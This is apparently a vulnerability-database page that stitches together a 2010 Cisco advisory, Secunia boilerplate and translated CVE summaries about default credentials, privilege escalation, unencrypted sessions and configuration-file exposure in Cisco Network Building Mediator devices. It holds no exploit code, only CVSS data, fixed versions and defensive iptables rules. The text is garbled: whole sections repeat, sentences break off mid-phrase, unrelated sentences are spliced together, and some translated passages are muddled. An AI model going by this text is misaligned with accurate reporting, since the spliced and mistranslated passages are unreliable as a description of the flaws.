a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g. credentials) is passed via
HTTP and XML-RPC over HTTP and may, therefore, be intercepted by a
third party.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0901 | CVE-2010-0598 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not encrypt HTTP sessions from operator workstations, which allows remote attackers to discover Administrator credentials by sniffing the network, aka Bug ID CSCtb83631. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The problem is Bug ID : CSCtb83631 Problem.Network intercepted by a third party Administrator May be able to find your credentials. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. There are several security vulnerabilities in Cisco Network Building Mediator, as follows: - Default Authentication Credentials (CVE-2010-0595): Multiple predefined users on the device, including administrator user accounts using default authentication information, any network access device Users can log in to the control system as an administrator.-Privilege Escalation (CVE-2010-0596, CVE-2010-0597): Vulnerability allows unauthorized users to read and modify device configurations, malicious users must be able to successfully authenticate, but do not require administrator privileges Or modify the device configuration if you know the administrator to verify the credentials. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Attackers can perform attacks and read configuration files via XML RPC or XML RCP over the HTTPS protocol.
An attacker can exploit this issue to obtain sensitive information that may lead to further attacks and possibly a full compromise of the affected device.
This issue is tracked by Cisco Bug ID CSCtb83631. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this
vulnerability can be exploited to reload the affected device. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered during internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2010-May-26 | public |
| | | release. |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (Darwin)
iEYEARECAAYFAkv9S00ACgkQ86n/Gc8U/uDJRQCcCCww9H/6P7BHqAZ9k29Tq4hj
EWQAn3eEfS/iAcbfn5ERow7JQO4QmnPg
=bCsA
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Stay Compliant
Alerts, Technical Descriptions, PoC, Links to patches, CVSS, CVE, Changelogs, Alternative Remediation Strategies, and much more provided in the Secunia Vulnerability Intelligence solutions
Free Trial
http://secunia.com/products/corporate/evm/trial/
----------------------------------------------------------------------
TITLE:
Cisco Network Building Mediator Products Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA39904
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/39904/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
RELEASE DATE:
2010-05-27
DISCUSS ADVISORY:
http://secunia.com/advisories/39904/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/39904/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=39904
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Some vulnerabilities have been reported in Cisco Network Building
Mediator, which can be exploited by malicious users to gain escalated
privileges and by malicious people to gain knowledge of sensitive
information.
2) Certain sensitive information (e.g.
SOLUTION:
Update to a fixed version.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0069 | CVE-2010-0600 | Cisco Network Building Mediator products contain multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 does not properly restrict network access to an unspecified configuration file, which allows remote attackers to read passwords and unspecified other account details via a (1) XML RPC or (2) XML RPC over HTTPS session, aka Bug ID CSCtb83512. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. There are several security vulnerabilities in Cisco Network Building Mediator, as follows: - Default Authentication Credentials (CVE-2010-0595): Multiple predefined users on the device, including administrator user accounts using default authentication information, any network access device Users can log in to the control system as an administrator.-Privilege Escalation (CVE-2010-0596, CVE-2010-0597): Vulnerability allows unauthorized users to read and modify device configurations, malicious users must be able to successfully authenticate, but do not require administrator privileges Or modify the device configuration if you know the administrator to verify the credentials. Both vulnerabilities need to be attacked via HTTP or HTTPS transport protocol. In addition, Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used for heavy-duty devices, continuous exploitation of vulnerabilities Can lead to denial of service attacks. - Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): Operator workstation Cisco Network Building Mediator did not protect unauthorized interception of sessions, malicious users could intercept sessions, obtain arbitrary authentication information, and use this information to control devices. CVE-2010-0598 related vulnerabilities allow malicious users to intercept HTTP session access The administrator verifies the credentials. CVE-2010-0599 related vulnerabilities allow malicious users to intercept XML RPC session access administrator authentication credentials. - Unauthorized Information Access (CVE-2010-0600): Malicious users can read system configuration files, configuration files Contains user account information, including passwords. Information obtained will allow attackers to gain administrative access to the affected device.
This issue is being tracked by Cisco Bugid CSCtb83512. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. All Mediator Framework software releases prior to 3.1.1 are
affected by all vulnerabilities listed in this security advisory.
This table provides information about affected software releases:
+---------------------------------------+
| Cisco Bug | Affects Software |
| ID | Releases |
|-------------+-------------------------|
| CSCtb83495 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83607 | 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83618 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83631 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83505 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83512 | 1.5.1, 2.2, 3.0.8 |
+---------------------------------------+
Vulnerable Products
+------------------
Users can determine the version of the Mediator Framework running on
a device by logging into the device. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0595.
* CSCtb83607 ( registered customers only) (registered customers
only) has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 ( registered customers only) has been assigned the CVE
identifier CVE-2010-0597. Additionally, this
vulnerability can be exploited to reload the affected device. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 ( registered customers only) has been assigned CVE
identifier CVE-2010-0598.
* CSCtb83505 ( registered customers only) has been assigned CVE
identifier CVE-2010-0599.
* CSCtb83512 ( registered customers only) has been assigned CVE
identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to HTTP protocol. There is no workaround for the
vulnerability that affects XML RPC service. The HTTPS service is enabled and running by
default and no further actions are needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand theservices tab, and
then expand tab the network tab. Click the http_server tab, and then
click the Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules form the above example care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
